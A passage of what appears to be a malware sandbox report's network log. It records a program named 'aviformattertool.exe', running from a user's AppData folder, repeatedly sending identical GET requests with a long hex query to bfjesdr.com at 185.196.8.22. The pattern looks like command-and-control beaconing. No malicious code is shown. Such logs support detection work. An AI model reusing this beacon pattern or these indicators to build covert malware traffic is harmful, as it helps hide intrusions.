Data Ascii: e67b680813008c20

Jan 13, 2024 06:33:42.979331017 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Jan 13, 2024 06:33:43.200664997 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 49803 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:43.510046005 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Jan 13, 2024 06:33:43.726180077 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20

Jan 13, 2024 06:33:43.838408947 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Jan 13, 2024 06:33:44.055813074 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 66 | Source IP: 192.168.2.4 | Source Port: 49804 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp: Jan 13, 2024 06:33:44.370754004 CET | Bytes transferred: 326 | Direction: OUT
    GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Jan 13, 2024 06:33:44.591407061 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 67 | Source IP: 192.168.2.4 | Source Port: 49805 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp: Jan 13, 2024 06:33:44.905829906 CET | Bytes transferred: 326 | Direction: OUT
    GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Jan 13, 2024 06:33:45.125348091 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 68 | Source IP: 192.168.2.4 | Source Port: 49806 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp: Jan 13, 2024 06:33:45.431524992 CET | Bytes transferred: 326 | Direction: OUT
    GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Jan 13, 2024 06:33:45.648302078 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 69 | Source IP: 192.168.2.4 | Source Port: 49807 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp: Jan 13, 2024 06:33:45.964760065 CET | Bytes transferred: 326 | Direction: OUT
    GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Jan 13, 2024 06:33:46.186628103 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 70 | Source IP: 192.168.2.4 | Source Port: 49808 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp: Jan 13, 2024 06:33:46.498207092 CET | Bytes transferred: 326 | Direction: OUT
    GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Jan 13, 2024 06:33:46.714344025 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Timestamp: Jan 13, 2024 06:33:46.826745033 CET | Bytes transferred: 326 | Direction: OUT
    GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Jan 13, 2024 06:33:47.043061018 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 71 | Source IP: 192.168.2.4 | Source Port: 49809 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp: Jan 13, 2024 06:33:47.360348940 CET | Bytes transferred: 326 | Direction: OUT
    GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Jan 13, 2024 06:33:47.581254959 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 72 | Source IP: 192.168.2.4 | Source Port: 49810 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp: Jan 13, 2024 06:33:47.886632919 CET | Bytes transferred: 326 | Direction: OUT
    GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Jan 13, 2024 06:33:48.110296965 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:48 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 73 | Source IP: 192.168.2.4 | Source Port: 49811 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp: Jan 13, 2024 06:33:48.417948961 CET | Bytes transferred: 326 | Direction: OUT
    GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Jan 13, 2024 06:33:48.634325981 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:48 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 74 | Source IP: 192.168.2.4 | Source Port: 49812 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp: Jan 13, 2024 06:33:48.938045025 CET | Bytes transferred: 326 | Direction: OUT
    GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Jan 13, 2024 06:33:49.160002947 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 75 | Source IP: 192.168.2.4 | Source Port: 49813 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:49.464920998 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:49.681108952 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 76 | Source IP: 192.168.2.4 | Source Port: 49814 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:49.996552944 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:50.222256899 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:50 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 77 | Source IP: 192.168.2.4 | Source Port: 49815 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:50.530996084 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:50.747817039 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:50 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 78 | Source IP: 192.168.2.4 | Source Port: 49816 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:51.060671091 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:51.283536911 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 79 | Source IP: 192.168.2.4 | Source Port: 49817 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:51.590154886 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:51.807215929 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 80 | Source IP: 192.168.2.4 | Source Port: 49818 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:52.130019903 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:52.354525089 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:52 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 81 | Source IP: 192.168.2.4 | Source Port: 49819 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:52.922993898 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:53.144440889 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:53 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 82 | Source IP: 192.168.2.4 | Source Port: 49820 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:54.626684904 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:54.847461939 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 83 | Source IP: 192.168.2.4 | Source Port: 49821 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:55.154104948 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:55.376924038 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID: 84 | Source IP: 192.168.2.4 | Source Port: 49822 | Destination IP: 185.196.8.22 | Destination Port: 80 | PID: 7388 | Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:55.683355093 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:55.899401903 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.4 | 49823 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:56.221788883 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:56.443429947 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.4 | 49824 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:56.748717070 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:56.964922905 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.4 | 49825 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:57.279830933 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
